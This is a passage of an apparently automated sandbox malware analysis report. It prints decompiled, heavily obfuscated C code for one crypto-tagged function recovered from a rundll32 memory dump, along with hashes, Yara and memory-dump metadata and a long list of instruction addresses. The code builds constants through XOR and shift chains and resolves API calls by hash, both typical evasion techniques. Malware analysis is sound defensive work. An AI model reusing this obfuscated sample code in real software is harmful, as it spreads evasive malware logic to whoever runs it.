                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: )L$Eh$QGf$Z$,$w)!$}+$%l$i _
                                                                                                                    • API String ID: 0-1553751006
                                                                                                                    • Opcode ID: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                    • Instruction ID: 5056e3c911e93ddb833111347c7a6487fa6045ce8a0e57947708346ce8e1343c
                                                                                                                    • Opcode Fuzzy Hash: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                    • Instruction Fuzzy Hash: E8A141B28193409FC389CF25D48A40FFBE1BB85748F515A1DF595AA220D3B5EA48CF82
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034F435 Relevance: 9.3, Strings: 7, Instructions: 536COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E0034F435(intOrPtr* __ecx, signed int __edx) {
				char _v128;
				char _v256;
				char _v288;
				intOrPtr _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				intOrPtr* _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				void* _t551;
				void* _t554;
				signed int _t560;
				void* _t563;
				int _t566;
				void* _t580;
				signed int* _t582;
				void* _t587;
				signed int _t595;
				void* _t598;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				intOrPtr* _t610;
				signed int _t634;
				void* _t659;
				signed int _t675;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				void* _t682;
				void* _t683;
				void* _t686;
				void* _t687;
				signed int _t692;
				signed int _t693;
				signed int* _t694;
				void* _t698;

				_t694 =  &_v520;
				_v296 = __edx;
				_v456 = __ecx;
				_v308 = 0x7c82e0;
				_v308 = _v308 ^ 0x9529f8b7;
				_v308 = _v308 ^ 0x95557a57;
				_v444 = 0xbd655a;
				_v444 = _v444 + 0x6586;
				_v444 = _v444 + 0xffff1486;
				_v444 = _v444 ^ 0x00b10b5d;
				_v360 = 0x6df28f;
				_v360 = _v360 >> 0xc;
				_v360 = _v360 ^ 0xc93a0f00;
				_v360 = _v360 ^ 0xc93b57a7;
				_v380 = 0x803da4;
				_v380 = _v380 + 0x81b0;
				_v380 = _v380 << 0x10;
				_v380 = _v380 ^ 0xbf59b73f;
				_v484 = 0xdeaf13;
				_v484 = _v484 | 0x05ba16e8;
				_v484 = _v484 + 0xffff5e7b;
				_v484 = _v484 + 0x21a5;
				_v484 = _v484 ^ 0x05f35408;
				_v516 = 0x9c12e3;
				_v516 = _v516 >> 5;
				_v516 = _v516 + 0x3879;
				_t686 = 0x618a3a9;
				_t676 = 0x46;
				_v516 = _v516 / _t676;
				_v516 = _v516 ^ 0x000beb5e;
				_v404 = 0x49e9fe;
				_v404 = _v404 + 0x1375;
				_v404 = _v404 | 0x014362a3;
				_v404 = _v404 ^ 0x01430578;
				_v408 = 0xd49d0c;
				_v408 = _v408 + 0x89ee;
				_v408 = _v408 | 0xbbfa4d8a;
				_v408 = _v408 ^ 0xbbf95772;
				_v504 = 0x33cefe;
				_v504 = _v504 >> 0xa;
				_v504 = _v504 >> 0xd;
				_v504 = _v504 + 0xffff4738;
				_v504 = _v504 ^ 0xfff61340;
				_v388 = 0x38423a;
				_t75 =  &_v388; // 0x38423a
				_t601 = 0x7b;
				_v388 =  *_t75 * 0x2c;
				_v388 = _v388 + 0x7a90;
				_v388 = _v388 ^ 0x09a92ca6;
				_v396 = 0x89c34a;
				_v396 = _v396 >> 6;
				_v396 = _v396 | 0xaa955d3e;
				_v396 = _v396 ^ 0xaa9cf099;
				_v316 = 0x54e1fb;
				_v316 = _v316 + 0xffff88b2;
				_v316 = _v316 ^ 0x0053b1cb;
				_v392 = 0xd67855;
				_v392 = _v392 + 0xd739;
				_v392 = _v392 * 0x34;
				_v392 = _v392 ^ 0x2bb8cf2c;
				_v512 = 0x9dc1ac;
				_v512 = _v512 | 0xff1b5e8c;
				_v512 = _v512 / _t601;
				_v512 = _v512 + 0xc237;
				_v512 = _v512 ^ 0x02115509;
				_v368 = 0xb0c27;
				_v368 = _v368 * 0x3a;
				_v368 = _v368 + 0x9417;
				_v368 = _v368 ^ 0x028ae81d;
				_v352 = 0x7ea940;
				_v352 = _v352 + 0xffff6a40;
				_v352 = _v352 | 0x1d7a7563;
				_v352 = _v352 ^ 0x1d74a207;
				_v340 = 0xd37cb9;
				_v340 = _v340 >> 5;
				_v340 = _v340 ^ 0x00021b7e;
				_v384 = 0xc54f7c;
				_v384 = _v384 | 0xe1c129a4;
				_v384 = _v384 << 6;
				_v384 = _v384 ^ 0x7152788e;
				_v320 = 0xafdf9b;
				_v320 = _v320 | 0x588bef45;
				_v320 = _v320 ^ 0x58ad1127;
				_v508 = 0x7882a6;
				_v508 = _v508 ^ 0x5ae648f7;
				_t677 = 0x7e;
				_v508 = _v508 / _t677;
				_v508 = _v508 + 0xffff266f;
				_v508 = _v508 ^ 0x00b4570c;
				_v344 = 0x25ec7c;
				_t158 =  &_v344; // 0x25ec7c
				_t692 = 0x77;
				_v344 =  *_t158 * 0x48;
				_v344 = _v344 ^ 0x0aab681c;
				_v332 = 0xac456;
				_v332 = _v332 ^ 0x143b2d92;
				_v332 = _v332 ^ 0x1438ce6d;
				_v436 = 0x1dd68;
				_v436 = _v436 + 0x1e14;
				_v436 = _v436 / _t692;
				_v436 = _v436 ^ 0x000407e3;
				_v468 = 0x975814;
				_v468 = _v468 | 0x165c3dad;
				_v468 = _v468 >> 3;
				_v468 = _v468 + 0x9a99;
				_v468 = _v468 ^ 0x02d4af38;
				_v428 = 0xd1fa32;
				_v428 = _v428 + 0x34cd;
				_v428 = _v428 >> 0xa;
				_v428 = _v428 ^ 0x000c7c43;
				_v372 = 0xb93604;
				_v372 = _v372 >> 0xb;
				_v372 = _v372 + 0x569f;
				_v372 = _v372 ^ 0x0001c97c;
				_v312 = 0xb8b780;
				_v312 = _v312 / _t601;
				_v312 = _v312 ^ 0x0009bb57;
				_v364 = 0xc6b8c5;
				_v364 = _v364 >> 4;
				_v364 = _v364 << 0xf;
				_v364 = _v364 ^ 0x35c8234d;
				_v500 = 0x5d2db3;
				_v500 = _v500 | 0xa4ec7bca;
				_v500 = _v500 * 0x42;
				_v500 = _v500 + 0xffff6871;
				_v500 = _v500 ^ 0x8955fb09;
				_v492 = 0xf8ac1c;
				_v492 = _v492 + 0xd489;
				_v492 = _v492 | 0x938b5662;
				_v492 = _v492 << 6;
				_v492 = _v492 ^ 0xfef6fac0;
				_v356 = 0x80a8a7;
				_v356 = _v356 >> 3;
				_v356 = _v356 + 0xffff1aa9;
				_v356 = _v356 ^ 0x00023cc5;
				_v420 = 0x29f504;
				_v420 = _v420 ^ 0x96d25191;
				_v420 = _v420 << 0xa;
				_v420 = _v420 ^ 0xee96722c;
				_v476 = 0x6526e6;
				_t250 =  &_v476; // 0x6526e6
				_t602 = 9;
				_t678 = 0x5e;
				_v476 =  *_t250 * 0x65;
				_t252 =  &_v476; // 0x6526e6
				_v476 =  *_t252 * 0x5d;
				_v476 = _v476 + 0xffffa50d;
				_v476 = _v476 ^ 0x7f6d4504;
				_v304 = 0x6f90;
				_v304 = _v304 + 0xffffb625;
				_v304 = _v304 ^ 0x0000ce69;
				_v348 = 0xd48165;
				_v348 = _v348 * 0x4f;
				_v348 = _v348 + 0xa298;
				_v348 = _v348 ^ 0x41980148;
				_v412 = 0x7e685b;
				_t271 =  &_v412; // 0x7e685b
				_v412 =  *_t271 * 0x1d;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 ^ 0x000f1110;
				_v460 = 0xd80dae;
				_v460 = _v460 * 0x4a;
				_v460 = _v460 << 9;
				_v460 = _v460 >> 5;
				_v460 = _v460 ^ 0x073a202e;
				_v324 = 0x2acd4f;
				_v324 = _v324 ^ 0x1744d618;
				_v324 = _v324 ^ 0x1766082c;
				_v400 = 0xe6723b;
				_v400 = _v400 ^ 0x220d80d9;
				_v400 = _v400 ^ 0x0161a8c1;
				_v400 = _v400 ^ 0x238d1a3c;
				_v376 = 0xaaa6;
				_v376 = _v376 + 0xd31a;
				_v376 = _v376 + 0xfffff53b;
				_v376 = _v376 ^ 0x00079406;
				_v452 = 0xe6cc76;
				_v452 = _v452 ^ 0xa4c29e28;
				_v452 = _v452 / _t602;
				_v452 = _v452 ^ 0x123fe3c8;
				_v520 = 0x822cac;
				_v520 = _v520 / _t678;
				_v520 = _v520 << 4;
				_v520 = _v520 << 9;
				_v520 = _v520 ^ 0x2c5f9d39;
				_v440 = 0xafb195;
				_v440 = _v440 + 0xffff123a;
				_v440 = _v440 >> 0xa;
				_v440 = _v440 ^ 0x0003dc41;
				_v448 = 0xdf86e4;
				_v448 = _v448 ^ 0xac60bb5d;
				_v448 = _v448 ^ 0x5238faed;
				_v448 = _v448 ^ 0xfe8be764;
				_v336 = 0x3e14c9;
				_v336 = _v336 << 7;
				_v336 = _v336 ^ 0x1f0fc953;
				_v496 = 0x4885f3;
				_v496 = _v496 * 0x25;
				_v496 = _v496 + 0x3aa8;
				_v496 = _v496 + 0xffff73aa;
				_v496 = _v496 ^ 0x0a7b30ee;
				_v480 = 0xca6b34;
				_v480 = _v480 >> 9;
				_v480 = _v480 + 0xfb6a;
				_v480 = _v480 / _t692;
				_v480 = _v480 ^ 0x000164ed;
				_v432 = 0xb19133;
				_t679 = 0x63;
				_t693 = _v296;
				_v432 = _v432 * 0x53;
				_v432 = _v432 >> 0x10;
				_v432 = _v432 ^ 0x00018cb4;
				_v328 = 0xdb466c;
				_t603 = _v296;
				_v328 = _v328 / _t679;
				_v328 = _v328 ^ 0x000e2190;
				_v488 = 0xd48740;
				_t680 = 0x44;
				_v488 = _v488 * 7;
				_v488 = _v488 * 0x66;
				_v488 = _v488 + 0x34f;
				_v488 = _v488 ^ 0x50c19e73;
				_v424 = 0xacfab2;
				_v424 = _v424 / _t680;
				_v424 = _v424 | 0xedf008b5;
				_v424 = _v424 ^ 0xedf22909;
				_v472 = 0x2e74a8;
				_v472 = _v472 * 0x3f;
				_v472 = _v472 ^ 0x6424471f;
				_v472 = _v472 >> 0xb;
				_v472 = _v472 ^ 0x0009d0c0;
				_v416 = 0x7e19d4;
				_v416 = _v416 << 0xd;
				_v416 = _v416 + 0x1081;
				_v416 = _v416 ^ 0xc3344569;
				_v464 = 0xa74bb7;
				_v464 = _v464 >> 0xb;
				_v464 = _v464 + 0x9c4;
				_v464 = _v464 >> 6;
				_v464 = _v464 ^ 0x000976a8;
				while(1) {
					L1:
					_t551 = 0xf168e34;
					do {
						while(1) {
							L2:
							_t698 = _t686 - 0x7498ebf;
							if(_t698 > 0) {
								break;
							}
							if(_t698 == 0) {
								_push(_v496);
								_push(_v336);
								_push(_v448);
								_t580 = E00337F1D(_v480, _t603, _v432, E00348606(_v440, 0x331560, __eflags), _v328, _v292 - _t603, _v488);
								E0033A8B0(_v424, _t577, _v472);
								_t582 = _v296;
								 *_t582 = _t693;
								_t582[1] = _t603 + _t580 - _t693;
								goto L29;
							}
							if(_t686 == 0x488924) {
								_t682 = _t682 +  *((intOrPtr*)(_t610 + 4));
								_push(_t610);
								_push(_t610);
								_t693 = E00337FF2(_t682);
								__eflags = _t693;
								_t551 = 0xf168e34;
								_t610 = _v456;
								_t686 =  !=  ? 0xf168e34 : 0xe639f63;
								continue;
							}
							if(_t686 == 0x123a276) {
								_push(_v468);
								_push(_v436);
								_t587 = E0034DCF7(_v332, 0x3315c0, __eflags);
								_push( &_v256);
								_push(_t587);
								_push(_t682);
								_push(_v300);
								 *((intOrPtr*)(E0033A42D(0xab2a8d8a, 0x2b7)))();
								E0033A8B0(_v428, _t587, _v372);
								_t694 =  &(_t694[5]);
								_t686 = 0x488924;
								L12:
								_t610 = _v456;
								while(1) {
									L1:
									_t551 = 0xf168e34;
									goto L2;
								}
							}
							if(_t686 != 0x57ff6e7) {
								if(_t686 == 0x5f676f3) {
									_t598 = E00340AE0(8, 1);
									_push(_v516);
									_t682 = _t598;
									_push( &_v288);
									_push(_t682);
									_push(9);
									E003380E3(_v380, _v484);
									_t686 = 0x7f96e60;
									L11:
									_t694 =  &(_t694[6]);
									goto L12;
								} else {
									if(_t686 != 0x618a3a9) {
										goto L28;
									} else {
										_t686 = 0x5f676f3;
										continue;
									}
								}
								L30:
								return _t595;
							}
							_t682 = 0x4000;
							_push(_t610);
							_push(_t610);
							_t595 = E00337FF2(0x4000);
							_v300 = _t595;
							__eflags = _t595;
							if(__eflags != 0) {
								_t686 = 0x123a276;
								goto L12;
							}
							goto L30;
						}
						__eflags = _t686 - 0x7f96e60;
						if(_t686 == 0x7f96e60) {
							_t554 = E00340AE0(0x10, 4);
							_push(_v396);
							_t682 = _t554;
							_push( &_v128);
							_push(_t682);
							_push(0xb);
							E003380E3(_v504, _v388);
							_t610 = _v456;
							_t694 =  &(_t694[6]);
							_t686 = 0x8d9b717;
							_t551 = 0xf168e34;
							goto L28;
						} else {
							__eflags = _t686 - 0x8d9b717;
							if(_t686 == 0x8d9b717) {
								_t687 =  &_v256;
								_t659 = E00340AE0(0x10, 8);
								_t560 = _v308;
								__eflags = _t560 - _t659;
								if(_t560 < _t659) {
									_t675 = _t659 - _t560;
									_t683 = _t687;
									_t634 = _t675 >> 1;
									__eflags = _t634;
									_t566 = memset(_t683, 0x2d002d, _t634 << 2);
									asm("adc ecx, ecx");
									_t687 = _t687 + _t675 * 2;
									memset(_t683 + _t634, _t566, 0);
									_t694 =  &(_t694[6]);
								}
								_t563 = E00340AE0(0x10, 8);
								_push(_v384);
								_t682 = _t563;
								_push(_t687);
								_push(_t682);
								_push(0xb);
								E003380E3(_v352, _v340);
								_t686 = 0x57ff6e7;
								goto L11;
							} else {
								__eflags = _t686 - 0xa9d081a;
								if(_t686 == 0xa9d081a) {
									E0033ED7E(_v452, _t603, _v520,  *_t610,  *((intOrPtr*)(_t610 + 4)));
									_t610 = _v456;
									_t694 =  &(_t694[3]);
									_t686 = 0x7498ebf;
									_t603 = _t603 +  *((intOrPtr*)(_t610 + 4));
									goto L1;
								} else {
									__eflags = _t686 - 0xe639f63;
									if(_t686 == 0xe639f63) {
										E00348519(_v416, _v464, _v300);
										return 0;
									}
									__eflags = _t686 - _t551;
									if(__eflags != 0) {
										goto L28;
									} else {
										_push(_v476);
										_push(_v420);
										_v292 = _t682 + _t693;
										_push(_v356);
										_t603 = E0034C0C1( &_v128, __eflags,  &_v288, E00348606(_v492, 0x331610, __eflags),  &_v256, _v348, _v412, _v460, _t693, _t682 + _t693 - _t693, _v324) + _t693;
										E0033A8B0(_v400, _t572, _v376);
										_t694 =  &(_t694[0xd]);
										_t686 = 0xa9d081a;
										goto L12;
									}
								}
							}
						}
						goto L30;
						L28:
						__eflags = _t686 - 0x7bf1275;
					} while (__eflags != 0);
					L29:
					return _v300;
				}
			}






























































































                                                                                                                    0x0034f435
                                                                                                                    0x0034f43f
                                                                                                                    0x0034f446
                                                                                                                    0x0034f44a
                                                                                                                    0x0034f455
                                                                                                                    0x0034f460
                                                                                                                    0x0034f46b
                                                                                                                    0x0034f473
                                                                                                                    0x0034f47b
                                                                                                                    0x0034f483
                                                                                                                    0x0034f48b
                                                                                                                    0x0034f496
                                                                                                                    0x0034f49e
                                                                                                                    0x0034f4a9
                                                                                                                    0x0034f4b4
                                                                                                                    0x0034f4bf
                                                                                                                    0x0034f4ca
                                                                                                                    0x0034f4d2
                                                                                                                    0x0034f4dd
                                                                                                                    0x0034f4e5
                                                                                                                    0x0034f4ed
                                                                                                                    0x0034f4f5
                                                                                                                    0x0034f4fd
                                                                                                                    0x0034f505
                                                                                                                    0x0034f50d
                                                                                                                    0x0034f512
                                                                                                                    0x0034f51e
                                                                                                                    0x0034f527
                                                                                                                    0x0034f52c
                                                                                                                    0x0034f532
                                                                                                                    0x0034f53a
                                                                                                                    0x0034f545
                                                                                                                    0x0034f550
                                                                                                                    0x0034f55b
                                                                                                                    0x0034f566
                                                                                                                    0x0034f571
                                                                                                                    0x0034f57c
                                                                                                                    0x0034f587
                                                                                                                    0x0034f592
                                                                                                                    0x0034f59a
                                                                                                                    0x0034f59f
                                                                                                                    0x0034f5a4
                                                                                                                    0x0034f5ac
                                                                                                                    0x0034f5b4
                                                                                                                    0x0034f5bf
                                                                                                                    0x0034f5c7
                                                                                                                    0x0034f5c8
                                                                                                                    0x0034f5cf
                                                                                                                    0x0034f5da
                                                                                                                    0x0034f5e5
                                                                                                                    0x0034f5f0
                                                                                                                    0x0034f5f8
                                                                                                                    0x0034f603
                                                                                                                    0x0034f60e
                                                                                                                    0x0034f619
                                                                                                                    0x0034f624
                                                                                                                    0x0034f62f
                                                                                                                    0x0034f63a
                                                                                                                    0x0034f64d
                                                                                                                    0x0034f654
                                                                                                                    0x0034f65f
                                                                                                                    0x0034f667
                                                                                                                    0x0034f675
                                                                                                                    0x0034f679
                                                                                                                    0x0034f681
                                                                                                                    0x0034f689
                                                                                                                    0x0034f69c
                                                                                                                    0x0034f6a3
                                                                                                                    0x0034f6ae
                                                                                                                    0x0034f6bb
                                                                                                                    0x0034f6c6
                                                                                                                    0x0034f6d1
                                                                                                                    0x0034f6dc
                                                                                                                    0x0034f6e7
                                                                                                                    0x0034f6f2
                                                                                                                    0x0034f6fa
                                                                                                                    0x0034f705
                                                                                                                    0x0034f710
                                                                                                                    0x0034f71b
                                                                                                                    0x0034f723
                                                                                                                    0x0034f72e
                                                                                                                    0x0034f739
                                                                                                                    0x0034f744
                                                                                                                    0x0034f74f
                                                                                                                    0x0034f757
                                                                                                                    0x0034f765
                                                                                                                    0x0034f76a
                                                                                                                    0x0034f76e
                                                                                                                    0x0034f776
                                                                                                                    0x0034f77e
                                                                                                                    0x0034f789
                                                                                                                    0x0034f793
                                                                                                                    0x0034f794
                                                                                                                    0x0034f79b
                                                                                                                    0x0034f7a6
                                                                                                                    0x0034f7b1
                                                                                                                    0x0034f7bc
                                                                                                                    0x0034f7c7
                                                                                                                    0x0034f7cf
                                                                                                                    0x0034f7df
                                                                                                                    0x0034f7e3
                                                                                                                    0x0034f7eb
                                                                                                                    0x0034f7f3
                                                                                                                    0x0034f7fb
                                                                                                                    0x0034f800
                                                                                                                    0x0034f808
                                                                                                                    0x0034f810
                                                                                                                    0x0034f818
                                                                                                                    0x0034f820
                                                                                                                    0x0034f825
                                                                                                                    0x0034f82d
                                                                                                                    0x0034f838
                                                                                                                    0x0034f840
                                                                                                                    0x0034f84b
                                                                                                                    0x0034f856
                                                                                                                    0x0034f86a
                                                                                                                    0x0034f871
                                                                                                                    0x0034f87c
                                                                                                                    0x0034f887
                                                                                                                    0x0034f88f
                                                                                                                    0x0034f897
                                                                                                                    0x0034f8a2
                                                                                                                    0x0034f8aa
                                                                                                                    0x0034f8b7
                                                                                                                    0x0034f8bb
                                                                                                                    0x0034f8c3
                                                                                                                    0x0034f8cb
                                                                                                                    0x0034f8d3
                                                                                                                    0x0034f8db
                                                                                                                    0x0034f8e3
                                                                                                                    0x0034f8e8
                                                                                                                    0x0034f8f0
                                                                                                                    0x0034f8fb
                                                                                                                    0x0034f903
                                                                                                                    0x0034f90e
                                                                                                                    0x0034f919
                                                                                                                    0x0034f921
                                                                                                                    0x0034f929
                                                                                                                    0x0034f930
                                                                                                                    0x0034f938
                                                                                                                    0x0034f940
                                                                                                                    0x0034f947
                                                                                                                    0x0034f94a
                                                                                                                    0x0034f94b
                                                                                                                    0x0034f94f
                                                                                                                    0x0034f954
                                                                                                                    0x0034f958
                                                                                                                    0x0034f960
                                                                                                                    0x0034f968
                                                                                                                    0x0034f973
                                                                                                                    0x0034f97e
                                                                                                                    0x0034f989
                                                                                                                    0x0034f99c
                                                                                                                    0x0034f9a3
                                                                                                                    0x0034f9ae
                                                                                                                    0x0034f9b9
                                                                                                                    0x0034f9c1
                                                                                                                    0x0034f9c6
                                                                                                                    0x0034f9ca
                                                                                                                    0x0034f9cf
                                                                                                                    0x0034f9d7
                                                                                                                    0x0034f9e4
                                                                                                                    0x0034f9e8
                                                                                                                    0x0034f9ed
                                                                                                                    0x0034f9f2
                                                                                                                    0x0034f9fa
                                                                                                                    0x0034fa05
                                                                                                                    0x0034fa10
                                                                                                                    0x0034fa1b
                                                                                                                    0x0034fa26
                                                                                                                    0x0034fa31
                                                                                                                    0x0034fa3c
                                                                                                                    0x0034fa47
                                                                                                                    0x0034fa52
                                                                                                                    0x0034fa5d
                                                                                                                    0x0034fa68
                                                                                                                    0x0034fa73
                                                                                                                    0x0034fa7b
                                                                                                                    0x0034fa8b
                                                                                                                    0x0034fa8f
                                                                                                                    0x0034fa97
                                                                                                                    0x0034faa7
                                                                                                                    0x0034faab
                                                                                                                    0x0034fab0
                                                                                                                    0x0034fab5
                                                                                                                    0x0034fabd
                                                                                                                    0x0034fac5
                                                                                                                    0x0034facd
                                                                                                                    0x0034fad2
                                                                                                                    0x0034fada
                                                                                                                    0x0034fae2
                                                                                                                    0x0034faea
                                                                                                                    0x0034faf2
                                                                                                                    0x0034fafa
                                                                                                                    0x0034fb05
                                                                                                                    0x0034fb0d
                                                                                                                    0x0034fb18
                                                                                                                    0x0034fb25
                                                                                                                    0x0034fb29
                                                                                                                    0x0034fb31
                                                                                                                    0x0034fb39
                                                                                                                    0x0034fb41
                                                                                                                    0x0034fb49
                                                                                                                    0x0034fb4e
                                                                                                                    0x0034fb5c
                                                                                                                    0x0034fb62
                                                                                                                    0x0034fb6a
                                                                                                                    0x0034fb79
                                                                                                                    0x0034fb7c
                                                                                                                    0x0034fb83
                                                                                                                    0x0034fb87
                                                                                                                    0x0034fb8c
                                                                                                                    0x0034fb94
                                                                                                                    0x0034fbaa
                                                                                                                    0x0034fbb1
                                                                                                                    0x0034fbb8
                                                                                                                    0x0034fbc3
                                                                                                                    0x0034fbd0
                                                                                                                    0x0034fbd1
                                                                                                                    0x0034fbda
                                                                                                                    0x0034fbde
                                                                                                                    0x0034fbe6
                                                                                                                    0x0034fbee
                                                                                                                    0x0034fc03
                                                                                                                    0x0034fc07
                                                                                                                    0x0034fc0f
                                                                                                                    0x0034fc17
                                                                                                                    0x0034fc24
                                                                                                                    0x0034fc28
                                                                                                                    0x0034fc30
                                                                                                                    0x0034fc35
                                                                                                                    0x0034fc3d
                                                                                                                    0x0034fc45
                                                                                                                    0x0034fc4a
                                                                                                                    0x0034fc52
                                                                                                                    0x0034fc5a
                                                                                                                    0x0034fc62
                                                                                                                    0x0034fc67
                                                                                                                    0x0034fc6f
                                                                                                                    0x0034fc74
                                                                                                                    0x0034fc7c
                                                                                                                    0x0034fc7c
                                                                                                                    0x0034fc7c
                                                                                                                    0x0034fc81
                                                                                                                    0x0034fc81
                                                                                                                    0x0034fc81
                                                                                                                    0x0034fc81
                                                                                                                    0x0034fc87
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0034fc8d
                                                                                                                    0x0034ffc3
                                                                                                                    0x0034ffcc
                                                                                                                    0x0034ffd3
                                                                                                                    0x0035000b
                                                                                                                    0x0035001f
                                                                                                                    0x00350024
                                                                                                                    0x00350030
                                                                                                                    0x00350032
                                                                                                                    0x00000000
                                                                                                                    0x00350032
                                                                                                                    0x0034fc99
                                                                                                                    0x0034fdb2
                                                                                                                    0x0034fdc5
                                                                                                                    0x0034fdc6
                                                                                                                    0x0034fdcc
                                                                                                                    0x0034fdd4
                                                                                                                    0x0034fdd6
                                                                                                                    0x0034fddc
                                                                                                                    0x0034fde0
                                                                                                                    0x00000000
                                                                                                                    0x0034fde0
                                                                                                                    0x0034fca5
                                                                                                                    0x0034fd4c
                                                                                                                    0x0034fd55
                                                                                                                    0x0034fd60
                                                                                                                    0x0034fd75
                                                                                                                    0x0034fd76
                                                                                                                    0x0034fd77
                                                                                                                    0x0034fd78
                                                                                                                    0x0034fd8a
                                                                                                                    0x0034fd9c
                                                                                                                    0x0034fda1
                                                                                                                    0x0034fda4
                                                                                                                    0x0034fd0b
                                                                                                                    0x0034fd0b
                                                                                                                    0x0034fc7c
                                                                                                                    0x0034fc7c
                                                                                                                    0x0034fc7c
                                                                                                                    0x00000000
                                                                                                                    0x0034fc7c
                                                                                                                    0x0034fc7c
                                                                                                                    0x0034fcb1
                                                                                                                    0x0034fcb9
                                                                                                                    0x0034fcdd
                                                                                                                    0x0034fce2
                                                                                                                    0x0034fcea
                                                                                                                    0x0034fcfa
                                                                                                                    0x0034fcfb
                                                                                                                    0x0034fcfc
                                                                                                                    0x0034fcfe
                                                                                                                    0x0034fd03
                                                                                                                    0x0034fd08
                                                                                                                    0x0034fd08
                                                                                                                    0x00000000
                                                                                                                    0x0034fcbb
                                                                                                                    0x0034fcc1
                                                                                                                    0x00000000
                                                                                                                    0x0034fcc7
                                                                                                                    0x0034fcc7
                                                                                                                    0x00000000
                                                                                                                    0x0034fcc7
                                                                                                                    0x0034fcc1
                                                                                                                    0x0034ffc2
                                                                                                                    0x0034ffc2
                                                                                                                    0x0034ffc2
                                                                                                                    0x0034fd1b
                                                                                                                    0x0034fd2d
                                                                                                                    0x0034fd2e
                                                                                                                    0x0034fd2f
                                                                                                                    0x0034fd34
                                                                                                                    0x0034fd3d
                                                                                                                    0x0034fd3f
                                                                                                                    0x0034fd45
                                                                                                                    0x00000000
                                                                                                                    0x0034fd45
                                                                                                                    0x00000000
                                                                                                                    0x0034fd3f
                                                                                                                    0x0034fde8
                                                                                                                    0x0034fdee
                                                                                                                    0x0034ff6b
                                                                                                                    0x0034ff70
                                                                                                                    0x0034ff7e
                                                                                                                    0x0034ff8b
                                                                                                                    0x0034ff8c
                                                                                                                    0x0034ff8d
                                                                                                                    0x0034ff8f
                                                                                                                    0x0034ff94
                                                                                                                    0x0034ff98
                                                                                                                    0x0034ff9b
                                                                                                                    0x0034ffa0
                                                                                                                    0x00000000
                                                                                                                    0x0034fdf4
                                                                                                                    0x0034fdf4
                                                                                                                    0x0034fdfa
                                                                                                                    0x0034fede
                                                                                                                    0x0034fef5
                                                                                                                    0x0034fef7
                                                                                                                    0x0034ff00
                                                                                                                    0x0034ff02
                                                                                                                    0x0034ff04
                                                                                                                    0x0034ff06
                                                                                                                    0x0034ff0f
                                                                                                                    0x0034ff0f
                                                                                                                    0x0034ff11
                                                                                                                    0x0034ff13
                                                                                                                    0x0034ff15
                                                                                                                    0x0034ff18
                                                                                                                    0x0034ff18
                                                                                                                    0x0034ff18
                                                                                                                    0x0034ff2a
                                                                                                                    0x0034ff2f
                                                                                                                    0x0034ff3d
                                                                                                                    0x0034ff46
                                                                                                                    0x0034ff47
                                                                                                                    0x0034ff48
                                                                                                                    0x0034ff4a
                                                                                                                    0x0034ff4f
                                                                                                                    0x00000000
                                                                                                                    0x0034fe00
                                                                                                                    0x0034fe00
                                                                                                                    0x0034fe06
                                                                                                                    0x0034febe
                                                                                                                    0x0034fec3
                                                                                                                    0x0034fec7
                                                                                                                    0x0034feca
                                                                                                                    0x0034fecf
                                                                                                                    0x00000000
                                                                                                                    0x0034fe0c
                                                                                                                    0x0034fe0c
                                                                                                                    0x0034fe12
                                                                                                                    0x00350049
                                                                                                                    0x00000000
                                                                                                                    0x0035004f
                                                                                                                    0x0034fe18
                                                                                                                    0x0034fe1a
                                                                                                                    0x00000000
                                                                                                                    0x0034fe20
                                                                                                                    0x0034fe20
                                                                                                                    0x0034fe2c
                                                                                                                    0x0034fe30
                                                                                                                    0x0034fe37
                                                                                                                    0x0034fe9a
                                                                                                                    0x0034fe9d
                                                                                                                    0x0034fea2
                                                                                                                    0x0034fea5
                                                                                                                    0x00000000
                                                                                                                    0x0034fea5
                                                                                                                    0x0034fe1a
                                                                                                                    0x0034fe06
                                                                                                                    0x0034fdfa
                                                                                                                    0x00000000
                                                                                                                    0x0034ffa5
                                                                                                                    0x0034ffa5
                                                                                                                    0x0034ffa5
                                                                                                                    0x0034ffb1
                                                                                                                    0x00000000
                                                                                                                    0x0034ffb1

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
